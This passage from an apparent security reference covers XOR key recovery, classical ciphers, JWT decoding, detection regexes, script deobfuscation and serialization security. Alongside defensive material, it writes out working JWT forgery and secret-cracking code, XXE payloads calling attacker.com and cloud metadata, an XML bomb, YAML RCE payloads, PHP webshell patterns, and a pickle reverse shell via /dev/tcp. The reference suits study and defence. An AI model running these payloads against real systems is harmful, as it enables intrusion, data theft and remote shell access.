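        if not (32 <= b < 127 or b in (9, 10, 13)):
            score -= 5  # control or high bytes are unlikely in plain text
        elif bytes([b]).lower()[0] in COMMON:
            score += 1
    return score / len(candidate)


def best_single_byte_key(ciphertext: bytes) -> tuple[int, bytes]:
    """Try all 256 keys and return the key and plaintext with the best score."""
    best = max(
        range(256),
        key=lambda k: english_score(bytes(b ^ k for b in ciphertext)),
    )
    return best, bytes(b ^ best for b in ciphertext)


# "attack at dawn" XORed with 0x42
ciphertext = bytes.fromhex("233636232129622336622623352c")
key, plaintext = best_single_byte_key(ciphertext)
print(f"Key 0x{key:02x}: {plaintext}")
```

For shellcode or other non-text payloads this scorer does not apply; a known-plaintext check against magic bytes is the better fit there.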
Known-plaintext XOR attack
def xor_known_plaintext(ciphertext: bytes, known_plain: bytes, offset: int = 0) -> bytes:
    """Recover XOR key using known plaintext at a known offset."""
    key_fragment = bytes(c ^ p for c, p in zip(ciphertext[offset:], known_plain))
    return key_fragment
# Example: PE files always start with 'MZ' (0x4d5a)
# If XOR-encoded PE is found, recover first 2 key bytes:
encoded_pe = b'\x1f\x28\x90\x00...' # hypothetical
known = b'MZ'
key_start = xor_known_plaintext(encoded_pe, known)
print(f"Key starts with: {key_start.hex()}")
# Known plaintext for common file types:
# PE/DLL: b'MZ' (4d5a)
# ELF: b'\x7fELF' (7f454c46)
# PDF: b'%PDF' (25504446)
# ZIP/DOCX: b'PK\x03\x04' (504b0304)
# GZIP: b'\x1f\x8b' (1f8b)
# PNG: b'\x89PNG\r\n\x1a\n' (89504e470d0a1a0a)
# JPEG: b'\xff\xd8\xff' (ffd8ff)
# Recover repeating key length using normalized Hamming distance
# (Kasiski examination is a different method: it looks for repeated ciphertext sequences)
def hamming_distance(b1: bytes, b2: bytes) -> int:
    return sum(bin(a ^ b).count('1') for a, b in zip(b1, b2))
def guess_key_length(ciphertext: bytes, max_len: int = 40) -> list[tuple[int, float]]:
    """Estimate repeating XOR key length via normalized Hamming distance."""
    scores = []
    for kl in range(2, max_len + 1):
        blocks = [ciphertext[i*kl:(i+1)*kl] for i in range(4)]
        if len(blocks[3]) < kl:
            continue
        distances = []
        for i in range(len(blocks)):
            for j in range(i+1, len(blocks)):
                distances.append(hamming_distance(blocks[i], blocks[j]) / kl)
        avg = sum(distances) / len(distances)
        scores.append((kl, avg))
    scores.sort(key=lambda x: x[1])
    return scores[:5]
# XOR with Python one-liner
python3 -c "
data = bytes.fromhex('233636232129622336622623352c')
key = 0x42
print(bytes(b ^ key for b in data))
"
# Analyze a XOR-encrypted file with xortool
# pip install xortool
xortool encrypted.bin # estimate probable key lengths
xortool -l 4 -c 00 encrypted.bin # key length 4, assume 0x00 is the most frequent plaintext byte
8. ROT13 / ROT47 / Caesar
ROT13 (letters only, A-Z / a-z shifted by 13)
import codecs
# Encode/Decode (symmetric — same operation)
encoded = codecs.encode("Attack at dawn", "rot_13") # "Nggnpx ng qnja"
decoded = codecs.encode(encoded, "rot_13") # "Attack at dawn"
# Manual implementation
def rot13(text: str) -> str:
    result = []
    for c in text:
        if 'a' <= c <= 'z':
            result.append(chr((ord(c) - ord('a') + 13) % 26 + ord('a')))
        elif 'A' <= c <= 'Z':
            result.append(chr((ord(c) - ord('A') + 13) % 26 + ord('A')))
        else:
            result.append(c)
    return ''.join(result)
echo "Attack at dawn" | tr 'A-Za-z' 'N-ZA-Mn-za-m' # Nggnpx ng qnja
echo "Nggnpx ng qnja" | tr 'A-Za-z' 'N-ZA-Mn-za-m' # Attack at dawn
# Alternative
echo "Attack at dawn" | rot13 # if rot13 command available
ROT47 (printable ASCII 33-126, shifted by 47)
def rot47(text: str) -> str:
    """ROT47: rotate printable ASCII characters (! through ~)."""
    result = []
    for c in text:
        o = ord(c)
        if 33 <= o <= 126:
            result.append(chr(33 + (o - 33 + 47) % 94))
        else:
            result.append(c)
    return ''.join(result)
encoded = rot47("Attack at dawn!") # "pEE24< 2E 52H?P"
decoded = rot47(encoded) # "Attack at dawn!"
echo "Attack at dawn!" | tr '!-~' 'P-~!-O'
General Caesar cipher (arbitrary shift)
def caesar(text: str, shift: int) -> str:
    result = []
    for c in text:
        if 'a' <= c <= 'z':
            result.append(chr((ord(c) - ord('a') + shift) % 26 + ord('a')))
        elif 'A' <= c <= 'Z':
            result.append(chr((ord(c) - ord('A') + shift) % 26 + ord('A')))
        else:
            result.append(c)
    return ''.join(result)
# Brute force all 26 shifts
def caesar_bruteforce(ciphertext: str) -> list[tuple[int, str]]:
    return [(shift, caesar(ciphertext, shift)) for shift in range(26)]
# Example: CTF challenge
for shift, candidate in caesar_bruteforce("Gur synt vf PGS{ebg13_vf_rnfl}"):
    if 'CTF' in candidate or 'flag' in candidate.lower():
        print(f"Shift {shift}: {candidate}")
# Shift 13: The flag is CTF{rot13_is_easy}
9. JWT (JSON Web Tokens)
Decode JWT (no verification)
import base64
import json
def jwt_decode(token: str) -> dict:
    """Decode JWT without verification (forensic/analysis use only)."""
    parts = token.split('.')
    if len(parts) != 3:
        raise ValueError("Invalid JWT format")
    def decode_part(part: str) -> dict:
        # Add padding
        padded = part + '=' * (-len(part) % 4)
        decoded = base64.urlsafe_b64decode(padded)
        return json.loads(decoded)
    header = decode_part(parts[0])
    payload = decode_part(parts[1])
    signature = parts[2]
    return {
        'header': header,
        'payload': payload,
        'signature': signature,
        'raw_parts': parts
    }
# Example
token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"
result = jwt_decode(token)
print(json.dumps(result['header'], indent=2))
# {"alg": "HS256", "typ": "JWT"}
print(json.dumps(result['payload'], indent=2))
# {"sub": "1234567890", "name": "John Doe", "iat": 1516239022}
# Bash — decode JWT
echo "eyJhbGciOiJIUzI1NiJ9" | base64 -d 2>/dev/null
# {"alg":"HS256"}
# Full decode
TOKEN="eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIn0.dozjgNryP4J3jVmNHl0w5N_XgL0n3I9PlFUP0THsR8U"
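# tr maps the URL-safe alphabet back to standard Base64; unpadded segments may still produce a (suppressed) warning
echo "$TOKEN" | cut -d. -f2 | tr '_-' '/+' | base64 -d 2>/dev/null | python3 -m json.tool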
Forge JWT with alg:none attack (unsigned token)
import base64
import json
def jwt_forge_none(payload: dict) -> str:
    """Forge JWT with alg:none; exploits servers that don't verify algorithm."""
    header = {"alg": "none", "typ": "JWT"}
    def encode_part(data: dict) -> str:
        return base64.urlsafe_b64encode(
            json.dumps(data, separators=(',', ':')).encode()
        ).rstrip(b'=').decode()
    return f"{encode_part(header)}.{encode_part(payload)}."
# Forge admin token
forged = jwt_forge_none({
    "sub": "1",
    "name": "admin",
    "role": "admin",
    "iat": 1516239022
})
print(forged)
# eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiIxIiwibmFtZSI6ImFkbWluIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNTE2MjM5MDIyfQ.
# Variations that bypass filters:
# "alg": "None"
# "alg": "NONE"
# "alg": "nOnE"
Forge JWT with HMAC/RSA confusion (CVE-2016-10555)
import hmac
import hashlib
import base64
import json
def jwt_forge_hmac_rsa_confusion(payload: dict, public_key: bytes) -> str:
    """
    If server uses RS256 but accepts HS256, sign with the PUBLIC key as HMAC secret.
    The server will verify using the public key as HMAC key, so the signature matches.
    """
    header = {"alg": "HS256", "typ": "JWT"}
    def encode_part(data: dict) -> str:
        return base64.urlsafe_b64encode(
            json.dumps(data, separators=(',', ':')).encode()
        ).rstrip(b'=').decode()
    header_b64 = encode_part(header)
    payload_b64 = encode_part(payload)
    signing_input = f"{header_b64}.{payload_b64}".encode()
    signature = hmac.new(public_key, signing_input, hashlib.sha256).digest()
    sig_b64 = base64.urlsafe_b64encode(signature).rstrip(b'=').decode()
    return f"{header_b64}.{payload_b64}.{sig_b64}"
# Usage: obtain server's public key (often in /.well-known/jwks.json or /api/public-key)
# with open("public.pem", "rb") as f:
# forged = jwt_forge_hmac_rsa_confusion({"sub": "admin"}, f.read())
Crack JWT secret (HS256)
# Using hashcat
hashcat -m 16500 jwt.txt wordlist.txt
# Using john the ripper
john jwt.txt --wordlist=wordlist.txt --format=HMAC-SHA256
# Using jwt_tool (pip install jwt_tool)
python3 jwt_tool.py <token> -C -d wordlist.txt
import hmac
import hashlib
import base64
def jwt_crack(token: str, wordlist_path: str) -> str | None:
    """Brute-force HS256 JWT secret from a wordlist."""
    parts = token.split('.')
    signing_input = f"{parts[0]}.{parts[1]}".encode()
    # Restore exactly the padding that base64url stripped
    target_sig = base64.urlsafe_b64decode(parts[2] + '=' * (-len(parts[2]) % 4))
    with open(wordlist_path, 'r', errors='ignore') as f:
        for line in f:
            secret = line.strip()
            computed = hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()
            if hmac.compare_digest(computed, target_sig):
                return secret
    return None
JWT security checklist
| Attack | Condition | Mitigation |
|---|---|---|
| alg:none | Server accepts unsigned tokens | Reject none algorithm; whitelist allowed algorithms |
| HMAC/RSA confusion | Server accepts HS256 when configured for RS256 | Enforce algorithm in server config, not from token header |
| Weak secret | Short/guessable HMAC key | Use 256+ bit random secret |
| No expiry | Missing exp claim | Always set and validate exp |
| kid injection | kid header used in SQL/file lookup | Sanitize kid, use allowlist |
| jwk/jku injection | Server fetches attacker-controlled key | Whitelist key sources |
| Claim tampering | Only signature checked, not claims | Validate all security-relevant claims server-side |
10. Regular Expressions for Security
IPv4 / IPv6
import re
# IPv4 — strict
IPV4 = re.compile(
r'\b(?:(?:25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)\.){3}'
r'(?:25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)\b'
)
# IPv4 with CIDR
IPV4_CIDR = re.compile(
r'\b(?:(?:25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)\.){3}'
r'(?:25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)(?:/\d{1,2})?\b'
)
# IPv6 — simplified (matches most common forms)
IPV6 = re.compile(r'\b(?:[0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}\b'
r'|(?:[0-9a-fA-F]{1,4}:)*:(?::[0-9a-fA-F]{1,4})*')
# Private/RFC1918 ranges
PRIVATE_IPV4 = re.compile(
r'\b(?:10\.\d{1,3}\.\d{1,3}\.\d{1,3}|'
r'172\.(?:1[6-9]|2\d|3[01])\.\d{1,3}\.\d{1,3}|'
r'192\.168\.\d{1,3}\.\d{1,3})\b'
)
URLs
URL = re.compile(
r'https?://(?:[\w-]+\.)+[\w]{2,}' # scheme + domain
r'(?::\d{1,5})?' # optional port
r'(?:/[^\s\'"<>]*)?' # optional path
)
# Extract domain from URL
DOMAIN = re.compile(r'https?://([^/:]+)')
EMAIL = re.compile(
r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b'
)
Hashes (for IOC extraction)
MD5_RE = re.compile(r'\b[0-9a-fA-F]{32}\b')
SHA1_RE = re.compile(r'\b[0-9a-fA-F]{40}\b')
SHA256_RE = re.compile(r'\b[0-9a-fA-F]{64}\b')
SHA512_RE = re.compile(r'\b[0-9a-fA-F]{128}\b')
CVE IDs
CVE = re.compile(r'CVE-\d{4}-\d{4,}')
Credit card numbers (PCI DSS scanning)
# Visa
VISA = re.compile(r'\b4\d{3}[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}\b')
# Mastercard
MC = re.compile(r'\b5[1-5]\d{2}[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}\b')
# AMEX
AMEX = re.compile(r'\b3[47]\d{2}[\s-]?\d{6}[\s-]?\d{5}\b')
# Generic (13-19 digits, optionally separated)
CC_GENERIC = re.compile(r'\b(?:\d[\s-]?){13,19}\b')
def luhn_check(number: str) -> bool:
"""Validate credit card number with Luhn algorithm."""
digits = [int(d) for d in number if d.isdigit()]
digits.reverse()
total = 0
for i, d in enumerate(digits):
if i % 2 == 1:
d *= 2
if d > 9:
d -= 9
total += d
return total % 10 == 0
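Digit-run patterns produce many false positives (order numbers, timestamps), so scanners usually keep only candidates that pass the Luhn check. The sketch below is self-contained and restates the Luhn logic; `CC_CANDIDATE` is a variant of the generic pattern that ends on a digit so matches carry no trailing separator, and `find_card_numbers` is a hypothetical helper name.

```python
import re

# 13-19 digits, optionally separated by single spaces or hyphens
CC_CANDIDATE = re.compile(r'\b\d(?:[ -]?\d){12,18}\b')


def luhn_ok(digits: str) -> bool:
    """Luhn checksum over a string of digits."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:      # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def find_card_numbers(text: str) -> list[str]:
    """Return normalized (digits-only) candidates that pass Luhn."""
    hits = []
    for match in CC_CANDIDATE.findall(text):
        digits = re.sub(r'\D', '', match)
        if luhn_ok(digits):
            hits.append(digits)
    return hits
```

Passing Luhn only means the number is well-formed; roughly one in ten random digit strings passes, so hits still need review.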
SSN (US Social Security Number)
SSN = re.compile(r'\b\d{3}-\d{2}-\d{4}\b')
# Stricter (excludes known invalid ranges)
SSN_STRICT = re.compile(
r'\b(?!000|666|9\d{2})\d{3}-(?!00)\d{2}-(?!0000)\d{4}\b'
)
API keys and secrets
# AWS Access Key ID
AWS_KEY = re.compile(r'\b(?:AKIA|ABIA|ACCA|ASIA)[0-9A-Z]{16}\b')
# AWS Secret Access Key
AWS_SECRET = re.compile(r'(?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=])')
# GitHub Personal Access Token
GITHUB_PAT = re.compile(r'\bghp_[A-Za-z0-9]{36}\b')
GITHUB_PAT_FINE = re.compile(r'\bgithub_pat_[A-Za-z0-9_]{82}\b')
# Slack Bot Token
SLACK_BOT = re.compile(r'\bxoxb-\d{10,13}-\d{10,13}-[a-zA-Z0-9]{24}\b')
# Slack Webhook
SLACK_WEBHOOK = re.compile(r'https://hooks\.slack\.com/services/T[A-Z0-9]{8}/B[A-Z0-9]{8}/[a-zA-Z0-9]{24}')
# Google API Key
GOOGLE_API = re.compile(r'\bAIza[0-9A-Za-z_-]{35}\b')
# Generic high-entropy string (potential secret)
import math
def entropy(s: str) -> float:
freq = {}
for c in s:
freq[c] = freq.get(c, 0) + 1
return -sum((f/len(s)) * math.log2(f/len(s)) for f in freq.values())
# Strings > 20 chars with entropy > 4.5 are suspicious
GENERIC_SECRET = re.compile(r'(?:key|token|secret|password|api_key|apikey|access_key)\s*[=:]\s*["\']?([A-Za-z0-9+/=_-]{20,})["\']?', re.IGNORECASE)
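The entropy function and the assignment pattern are most useful together: the regex finds candidate values and entropy filters out low-randomness ones such as placeholders. A minimal sketch follows; `likely_secrets` and the default threshold of 4.0 are assumptions for illustration. Note that a string needs at least 23 distinct characters before its per-character entropy can exceed 4.5 bits, so the threshold should be tuned to the token lengths you expect.

```python
import math
import re

SECRET_ASSIGNMENT = re.compile(
    r'(?:key|token|secret|password|api_key|apikey|access_key)\s*[=:]\s*'
    r'["\']?([A-Za-z0-9+/=_-]{20,})["\']?',
    re.IGNORECASE,
)


def shannon_entropy(s: str) -> float:
    """Shannon entropy in bits per character."""
    if not s:
        return 0.0
    counts = {}
    for c in s:
        counts[c] = counts.get(c, 0) + 1
    return -sum((n / len(s)) * math.log2(n / len(s)) for n in counts.values())


def likely_secrets(text: str, min_entropy: float = 4.0) -> list[str]:
    """Values assigned to secret-looking names whose entropy is high."""
    return [m.group(1) for m in SECRET_ASSIGNMENT.finditer(text)
            if shannon_entropy(m.group(1)) >= min_entropy]
```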
# Private key markers
PRIVATE_KEY = re.compile(r'-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----')
# JWT pattern
JWT_RE = re.compile(r'\beyJ[A-Za-z0-9_-]*\.eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9_-]*\b')
Combined IOC extractor
def extract_iocs(text: str) -> dict[str, list[str]]:
"""Extract all security-relevant indicators from text."""
return {
'ipv4': list(set(IPV4.findall(text))),
'email': list(set(EMAIL.findall(text))),
'url': list(set(URL.findall(text))),
'md5': list(set(MD5_RE.findall(text))),
'sha1': list(set(SHA1_RE.findall(text))),
'sha256': list(set(SHA256_RE.findall(text))),
'cve': list(set(CVE.findall(text))),
'aws_key': list(set(AWS_KEY.findall(text))),
'github_pat': list(set(GITHUB_PAT.findall(text))),
'jwt': list(set(JWT_RE.findall(text))),
'private_key': list(set(PRIVATE_KEY.findall(text))),
}
11. Obfuscation & Deobfuscation
JavaScript obfuscation patterns
# --- JSFuck (encode JS using only []()!+ ) ---
# 's' becomes: (![]+[])[+!+[]+!+[]+!+[]]  (i.e. "false"[3])
# Full charset available from 6 characters
# --- Hex escape obfuscation ---
# eval("\x61\x6c\x65\x72\x74\x28\x31\x29") -> eval("alert(1)")
# --- Unicode escape ---
# \u0061\u006c\u0065\u0072\u0074(1) -> alert(1)
# --- String.fromCharCode ---
# eval(String.fromCharCode(97,108,101,114,116,40,49,41)) -> eval("alert(1)")
# --- Deobfuscate String.fromCharCode ---
def deobfuscate_charcode(js: str) -> str:
"""Deobfuscate String.fromCharCode() calls."""
import re
pattern = r'String\.fromCharCode\(([\d,\s]+)\)'
def replace(m):
chars = [int(c.strip()) for c in m.group(1).split(',')]
return repr(''.join(chr(c) for c in chars))
return re.sub(pattern, replace, js)
# --- Deobfuscate hex/unicode escapes ---
def deobfuscate_js_escapes(js: str) -> str:
"""Resolve \\xNN and \\uNNNN escapes in JavaScript strings."""
import re
# \xNN
result = re.sub(r'\\x([0-9a-fA-F]{2})',
lambda m: chr(int(m.group(1), 16)), js)
# \uNNNN
result = re.sub(r'\\u([0-9a-fA-F]{4})',
lambda m: chr(int(m.group(1), 16)), result)
return result
# --- Deobfuscate atob() (base64 in JS) ---
# atob("YWxlcnQoMSk=") -> "alert(1)"
def deobfuscate_atob(js: str) -> str:
import re, base64
pattern = r'atob\(["\']([A-Za-z0-9+/=]+)["\']\)'
def replace(m):
return repr(base64.b64decode(m.group(1)).decode())
return re.sub(pattern, replace, js)
PowerShell obfuscation patterns
# --- Encoded command ---
# powershell -enc <base64 of UTF-16LE>
import base64
def decode_ps_encoded_command(encoded: str) -> str:
return base64.b64decode(encoded).decode('utf-16-le')
# --- String concatenation ---
# 'Inv'+'oke'+'-Exp'+'ression' -> 'Invoke-Expression'
# --- Backtick escaping ---
# I`nv`oke-`Exp`ression -> Invoke-Expression
def deobfuscate_backticks(ps: str) -> str:
import re
# Remove backticks that escape normal characters (not special ones)
return re.sub(r'`([^0abfnrtv])', r'\1', ps)
# --- [char] casts with character codes ---
# [char]73 + [char]69 + [char]88 -> 'IEX'
def deobfuscate_char_cast(ps: str) -> str:
import re
def replace(m):
return chr(int(m.group(1)))
return re.sub(r'\[char\]\s*(\d+)', replace, ps, flags=re.IGNORECASE)
# --- Environment variable concatenation ---
# $env:comspec[4,15,25]-join'' -> 'Iex' (chars 4, 15, 25 of 'C:\WINDOWS\system32\cmd.exe'; PowerShell command names are case-insensitive)
# --- Compressed / deflate streams ---
# IEX(New-Object IO.StreamReader((New-Object IO.Compression.DeflateStream(
# [IO.MemoryStream][Convert]::FromBase64String('...'),
# [IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()
def decode_ps_deflate(b64_data: str) -> str:
import base64, zlib
compressed = base64.b64decode(b64_data)
# PowerShell uses raw deflate (no zlib header), wbits=-15
return zlib.decompress(compressed, -15).decode('utf-8', errors='replace')
# --- Combined deobfuscation pipeline ---
def deobfuscate_powershell(script: str) -> str:
script = deobfuscate_backticks(script)
script = deobfuscate_char_cast(script)
# Remove common no-op patterns
script = script.replace("( ", "(").replace(" )", ")")
return script
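The pipeline above does not handle the string-concatenation pattern (`'Inv'+'oke'+...`). One way to collapse it is a regex applied repeatedly until nothing changes. This is a sketch under simplifying assumptions: only single-quoted literals are handled, and PowerShell's doubled-quote escape (`''`) is not. `collapse_string_concat` is a hypothetical name.

```python
import re

# Two adjacent single-quoted literals joined by '+'
_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")


def collapse_string_concat(ps: str) -> str:
    """Merge 'a'+'b' into 'ab', repeating until no pair is left."""
    previous = None
    while previous != ps:
        previous = ps
        ps = _CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", ps)
    return ps
```

Each pass merges non-overlapping pairs, so a chain of four fragments needs two passes; the loop stops once the text is stable.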
Python obfuscation patterns
# --- exec(compile()) ---
# exec(compile(base64.b64decode(b'cHJpbnQoImhlbGxvIik='),'<string>','exec'))
# --- Lambda chains ---
# (lambda: (lambda f: f(f))(lambda f: print("hello")))()
# --- Marshal/bytecode ---
import marshal, types
code = compile("print('hello')", "<string>", "exec")
serialized = marshal.dumps(code)
# Reconstruct: exec(marshal.loads(serialized))
# --- Deobfuscation: extract strings from exec/eval ---
def safe_deobfuscate_exec(code: str) -> str:
"""Replace exec/eval with print to see what would execute."""
import re
code = re.sub(r'\bexec\s*\(', 'print(', code)
code = re.sub(r'\beval\s*\(', 'print(', code)
return code
# WARNING: Only run deobfuscated code in a sandbox/VM
PHP obfuscation patterns
// Common patterns in webshells:
// eval(base64_decode('...'))
// eval(gzinflate(base64_decode('...')))
// eval(str_rot13('...'))
// preg_replace('/.*/e', base64_decode('...'), '') // /e modifier = eval (PHP < 7)
// assert(base64_decode('...')) // string argument is evaluated like eval (removed in PHP 8)
// create_function('', base64_decode('...')) // anonymous eval (removed in PHP 8)
// Variable function calls (hiding function names):
// $f = 'sys'.'tem'; $f('whoami');
// $_GET['cmd']($_GET['arg']); // webshell one-liner
// chr() obfuscation:
// $f = chr(115).chr(121).chr(115).chr(116).chr(101).chr(109); $f('id');
# Deobfuscate PHP eval(base64_decode(...))
import re
import base64
def deobfuscate_php_b64(php_code: str) -> str:
pattern = r'(?:eval|assert)\s*\(\s*base64_decode\s*\(\s*[\'"]([A-Za-z0-9+/=]+)[\'"]\s*\)\s*\)'
def replace(m):
decoded = base64.b64decode(m.group(1)).decode('utf-8', errors='replace')
return f'/* DECODED: */ {decoded}'
return re.sub(pattern, replace, php_code)
# Deobfuscate PHP chr() chains
def deobfuscate_php_chr(php_code: str) -> str:
    """Collapse chr(N).chr(M)... chains into a single quoted string."""
    # Only dots between chr() calls are removed; other dots are left intact
    chain = re.compile(r'chr\(\s*\d+\s*\)(?:\s*\.\s*chr\(\s*\d+\s*\))*')
    def replace(m):
        codes = re.findall(r'\d+', m.group(0))
        # PHP's chr() wraps its argument modulo 256
        return "'" + ''.join(chr(int(c) % 256) for c in codes) + "'"
    return chain.sub(replace, php_code)
12. Serialization Security
JSON
import json
# Standard encode/decode
data = {"user": "admin", "role": "user"}
encoded = json.dumps(data)
decoded = json.loads(encoded)
# Security: JSON injection via key/value manipulation
# If user controls a JSON key or value without escaping:
# {"user": "admin", "role": "user"} could become
# {"user": "admin", "role": "admin"} via parameter pollution
# JSON comment stripping (some parsers accept comments)
# {"key": "value" /* comment */} -> invalid JSON but some libs accept it
# Large number handling (precision loss)
# JavaScript: JSON.parse('{"id": 9999999999999999}') -> 10000000000000000
# Python handles arbitrary precision; JS does not
# Duplicate key behavior (parser-dependent)
json.loads('{"a": 1, "a": 2}') # Python: {'a': 2} (last wins)
# Other parsers may take first, error, or behave inconsistently
# Exploitation: WAF parses first key, backend parses last key
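Because duplicate-key handling differs between parsers, a conservative backend can simply reject documents that contain duplicates. A minimal sketch using the `object_pairs_hook` parameter of `json.loads`; the names `reject_duplicate_keys` and `strict_loads` are illustrative:

```python
import json


def reject_duplicate_keys(pairs):
    """object_pairs_hook that raises instead of silently keeping one value."""
    seen = {}
    for key, value in pairs:
        if key in seen:
            raise ValueError(f"duplicate JSON key: {key!r}")
        seen[key] = value
    return seen


def strict_loads(text: str):
    # The hook runs for every object, including nested ones
    return json.loads(text, object_pairs_hook=reject_duplicate_keys)
```

Rejecting outright avoids having to guess which value an upstream filter or WAF saw.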
XML (XXE, XSS, billion laughs)
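# --- DANGEROUS: many XML parsers resolve external entities (XXE) by default ---
# Python's xml.etree.ElementTree does not fetch external entities, but it can still be hit by
# entity-expansion bombs on Expat builds before 2.4.1; never parse untrusted XML without hardening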
# XXE payload examples:
xxe_file_read = """<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>"""
xxe_ssrf = """<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<root>&xxe;</root>"""
xxe_oob = """<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
%xxe;
]>
<root>&send;</root>"""
# Billion Laughs (XML bomb) — exponential entity expansion
xml_bomb = """<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<root>&lol9;</root>"""
# 3 bytes "lol" expands to ~300 MB here (10^8 copies); the classic variant with one more level reaches ~3 GB
# SAFE XML parsing in Python
import defusedxml.ElementTree as ET # pip install defusedxml
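# or with stdlib:
from xml.etree.ElementTree import XMLParser
# The stdlib has no simple switch to forbid DTDs or entities; you must reject DOCTYPE
# declarations yourself (e.g. with expat handlers), so defusedxml is strongly preferred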
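When defusedxml cannot be installed, one stdlib-only option is to refuse any document that declares a DOCTYPE, since XXE and entity bombs both depend on one. The sketch below pre-scans the input with an expat parser whose doctype handler raises, then hands clean input to ElementTree. `DTDForbidden` and `parse_without_dtd` are hypothetical names, and this is a narrower safeguard than what defusedxml provides.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DTDForbidden(ValueError):
    """Raised when the document contains a DOCTYPE declaration."""


def _forbid_doctype(name, sysid, pubid, has_internal_subset):
    raise DTDForbidden(f"DOCTYPE declaration not allowed: {name}")


def parse_without_dtd(xml_text: str) -> ET.Element:
    """Parse XML only if it contains no DOCTYPE (and thus no entities)."""
    scanner = expat.ParserCreate()
    # The handler fires at the start of the DOCTYPE, before any entity
    # reference in the document body could be expanded
    scanner.StartDoctypeDeclHandler = _forbid_doctype
    scanner.Parse(xml_text, True)
    return ET.fromstring(xml_text)
```

The document is parsed twice, which is acceptable for small inputs; for large payloads a size limit should be enforced before either pass.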
YAML (arbitrary code execution)
import yaml
# DANGEROUS: yaml.load() with an unsafe Loader (yaml.Loader / yaml.UnsafeLoader, the default before PyYAML 5.1) executes arbitrary Python
dangerous_yaml = """
!!python/object/apply:os.system
args: ['id']
"""
# yaml.load(dangerous_yaml, Loader=yaml.UnsafeLoader) # EXECUTES 'id'
# SAFE: Always use SafeLoader
safe = yaml.safe_load("key: value")
# Exploit payloads:
yaml_rce_payloads = [
"!!python/object/apply:os.system ['whoami']",
"!!python/object/apply:subprocess.check_output [['id']]",
"!!python/object/new:os.system ['curl http://attacker.com']",
"!!python/object/apply:builtins.eval ['__import__(\"os\").system(\"id\")']",
]
# Ruby YAML (Psych) RCE:
# --- !!ruby/object:Gem::Installer
# --- i: x
# --- !!ruby/object:Gem::SpecFetcher
# --- i: y
# --- !!ruby/object:Gem::Requirement
# --- requirements:
# --- !!ruby/object:Gem::Package::TarReader
# --- io: &1 !!ruby/object:Net::BufferedIO
# --- io: &1 !!ruby/object:Gem::Package::TarReader::Entry
# --- read: 0
# --- header: "abc"
# --- debug_output: &1 !!ruby/object:Net::WriteAdapter
# --- socket: &1 !!ruby/object:Gem::RequestSet
# --- sets: !!ruby/object:Net::WriteAdapter
# --- socket: !ruby/module 'Kernel'
# --- method_id: :system
# --- git_set: id
# --- method_id: :resolve
Python pickle (arbitrary code execution)
import pickle
import os
# NEVER unpickle untrusted data — equivalent to eval()
# RCE via pickle:
class Exploit:
def __reduce__(self):
return (os.system, ('id',))
payload = pickle.dumps(Exploit())
print(payload)
# Unpickling this runs 'id'
# More sophisticated: reverse shell via pickle
class ReverseShell:
def __reduce__(self):
import subprocess
return (subprocess.Popen, (
['bash', '-c', 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'],
))
# Detection: look for these opcodes in pickle data
# \x80 = PROTO
# c = GLOBAL (c__builtin__\neval\n -> dangerous)
# R = REDUCE (calls the callable)
# ( = MARK
def is_pickle_dangerous(data: bytes) -> bool:
"""Heuristic check for dangerous pickle opcodes."""
dangerous_modules = [b'os', b'subprocess', b'builtins', b'nt',
b'posix', b'commands', b'sys', b'importlib']
for mod in dangerous_modules:
if mod in data:
return True
return False
